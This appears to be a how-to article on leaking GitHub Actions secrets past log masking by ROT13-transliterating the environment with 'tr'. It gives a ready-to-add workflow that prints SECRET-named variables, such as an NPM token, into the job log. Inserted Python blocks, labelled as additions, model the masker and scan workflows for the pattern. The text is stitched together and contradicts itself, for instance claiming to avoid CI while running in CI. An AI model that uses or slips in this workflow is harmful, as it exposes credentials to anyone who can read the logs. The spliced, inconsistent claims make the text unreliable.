How to Leak GitHub Secrets with a Simple Shell Script using ROT13 Transliteration
GitHub Actions makes it hard to extract and view sensitive information: secret values are automatically redacted from workflow logs, so printing one shows only ***. This article explores an approach for dumping all or selected secrets from GitHub Actions by transliterating them with ROT13, a simple substitution cipher that shifts each letter 13 places along the alphabet (e.g., 'A' becomes 'N', and applying the same shift again restores 'A'). The shifted text no longer matches the registered secret value, so the log redactor leaves it untouched.
Understanding The Need: Accessing GitHub Secrets Without CI Invocation
This discussion extends earlier questions about retrieving the values of secrets stored in a repository without initiating the usual continuous integration processes: GitHub hands secrets only to workflow runs and never lets them be read back directly, for security reasons. In this context, we'll demonstrate how ROT13 encoding, combined with a shell script inside the GitHub Actions environment itself, gives temporary visibility of a secret's value during the job's execution, at a point where the redaction rule against printing secrets does not fire.
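To make concrete why the transliteration defeats the redaction, here is an added Python example (not code from the article) that models the log masker as exact-substring replacement, a simplifying assumption about GitHub's behaviour, and shows that the ROT13 form of a constructed secret value passes through unmasked while the original does not. The takeaway for defenders is that log masking is a cosmetic control: anyone who can modify a workflow file can read every secret that workflow receives, so write access to workflow files must be treated as access to the secrets themselves.

```python
import codecs

# Model of a log redactor: every registered secret value that appears verbatim
# in a log line is replaced by "***". This is an assumption/simplification of
# what GitHub Actions does to workflow output, not a copy of its implementation.
MASK = "***"


def mask_secrets(line, secrets):
    """Redact exact occurrences of each secret value (longest first, so a
    short secret cannot break the match of a longer one containing it)."""
    for value in sorted(secrets, key=len, reverse=True):
        if value:
            line = line.replace(value, MASK)
    return line


def rot13(text):
    """Same transliteration as `tr 'A-Za-z' 'N-ZA-Mn-za-m'`: letters shift 13
    places, everything else (digits, punctuation) passes through unchanged."""
    return codecs.encode(text, "rot_13")


def leak_survives_masking(secret, secrets):
    """True when the ROT13 form of `secret` passes the redactor untouched,
    i.e. the masker's substring match never fires on it. A secret with no
    letters (digits only) is its own ROT13 and is therefore still masked."""
    return mask_secrets(rot13(secret), secrets) == rot13(secret)


if __name__ == "__main__":
    # Constructed sample values, not real credentials.
    registry = ["hunter2secret", "AKIAEXAMPLEKEY"]
    line = "NPM_TOKEN=hunter2secret AWS_TOKEN=AKIAEXAMPLEKEY"
    print(mask_secrets(line, registry))          # both values replaced by ***
    print(mask_secrets(rot13(line), registry))   # letters shifted, nothing masked
    print(rot13(rot13(line)) == line)            # ROT13 is its own inverse
```

Running the block prints the masked original line, then the ROT13 line with nothing masked; the redactor never sees the registered value because every letter has been shifted, and the reader recovers it by shifting once more.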
Leveraging The Shell Script Method: Step-by-Step Guide
To expose your secret values using ROT13, add the following workflow file to your repository. The method is a shell script that shifts each letter of the secrets to its ROT13 counterpart when executed on the Ubuntu runner provided by GitHub:
name: Secret Leak Script
on: [push]                         # Trigger only for push events.
jobs:
  Shell-SecretLeaker:
    runs-on: ubuntu-latest         # Use GitHub's latest Ubuntu runner.
    steps:
      - name: Set env with secrets
        env:
          # Map each repository secret to a SECRET_-prefixed environment
          # variable so the grep below finds it; NPM_TOKEN is an example name.
          SECRET_NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: |
          export LC_ALL=C
          # Print only variables whose name contains SECRET, then apply the
          # ROT13 transliteration. The shifted text no longer matches the
          # secret's registered value, so the log redactor does not replace
          # it with ***; note it is transliterated, not encrypted.
          env | grep SECRET | tr 'A-MN-Za-mn-z' 'N-ZA-Mn-za-m'
        shell: sh                  # Run the script with POSIX sh.
Place the workflow above in the .github/workflows directory of the repository to define and enable it as part of your CI pipeline. It runs on every push event and triggers nothing else (no deployments or additional validations beyond this leak script). This way you can temporarily examine what secrets are exposed as environment variables (NPM_TOKEN, AWS_TOKEN, etc.) when the repository is updated, while the log redaction continues to protect secret values in every other step.
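From the detection side, a code reviewer or a pre-merge check can flag workflow steps that dump the environment or apply the ROT13 tr sets shown above, since a legitimate build step has no reason to do either. The following Python scanner is an added example (not part of the article); it uses the article's own workflow as a constructed sample, limits its rules to the two patterns that workflow exhibits, and the rule names and the hypothetical CLEAN_WORKFLOW sample are my own.

```python
import re

# Constructed samples for the scanner: the article's workflow, and a benign
# step that uses a secret without dumping it, so the scanner has a clean case.
LEAK_WORKFLOW = """\
name: Secret Leak Script
on: [push]
jobs:
  Shell-SecretLeaker:
    runs-on: ubuntu-latest
    steps:
      - name: Set env with secrets
        env:
          SECRET_NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: |
          export LC_ALL=C
          env | grep SECRET | tr 'A-MN-Za-mn-z' 'N-ZA-Mn-za-m'
        shell: sh
"""

CLEAN_WORKFLOW = """\
name: Publish
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - name: Publish package
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
        run: npm publish
"""

# Detection rules, one per pattern the leaking workflow exhibits:
#  env-dump : the whole environment (env/printenv) is piped into another command
#  rot13-tr : tr is invoked with the ROT13 target set 'N-ZA-Mn-za-m'
RULES = [
    ("env-dump", re.compile(r"\b(env|printenv)\b\s*\|")),
    ("rot13-tr", re.compile(r"\btr\b[^|]*'N-ZA-Mn-za-m'")),
]


def scan_workflow(text):
    """Return (line_number, step_name, rule, script_line) for every script
    line inside a run: step that matches a rule. Only the commands a step
    runs are inspected, not the YAML around them."""
    findings = []
    step_name = None
    in_run = False
    run_indent = 0

    def check(lineno, line):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, step_name, rule, line))

    for lineno, raw in enumerate(text.splitlines(), 1):
        stripped = raw.strip()
        indent = len(raw) - len(raw.lstrip(" "))
        # A non-blank line indented at or above the run: key ends the block.
        if in_run and stripped and indent <= run_indent:
            in_run = False
        if in_run:
            check(lineno, stripped)
            continue
        name_match = re.match(r"-\s*name:\s*(.+)", stripped)
        if name_match:
            step_name = name_match.group(1).strip()
            continue
        run_match = re.match(r"run:\s*(.*)", stripped)
        if run_match:
            body = run_match.group(1).strip()
            if body in ("|", "|-", ">", ">-"):      # block scalar: script follows
                in_run, run_indent = True, indent
            else:                                    # inline one-line script
                check(lineno, body)

    return findings


if __name__ == "__main__":
    for finding in scan_workflow(LEAK_WORKFLOW):
        print("line %d, step %r, rule %s: %s" % finding)
    print("clean workflow findings:", scan_workflow(CLEAN_WORKFLOW))
```

Because the check only looks at the commands a step executes, ordinary use of the secrets context (as in the clean sample) produces no finding; the signal is the combination of reading the environment wholesale and transforming it before it reaches the log. Pair this with branch protection on .github/workflows, since the push that introduces such a step is the event worth alerting on.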
Cautionary Note: Ethical Considerations and Legal Implications
Be mindful that accessing secrets in such a manner may violate GitHub's terms of service or local laws regarding data protection (such as GDPR). This approach is provided purely for educational purposes, to help understand how a repository holds sensitive information. In practice, ensure you have the necessary permissions to handle secret management and comply with relevant policies before attempting any form of security testing on real repositories, which may affect privacy rights and the legal standing associated with them.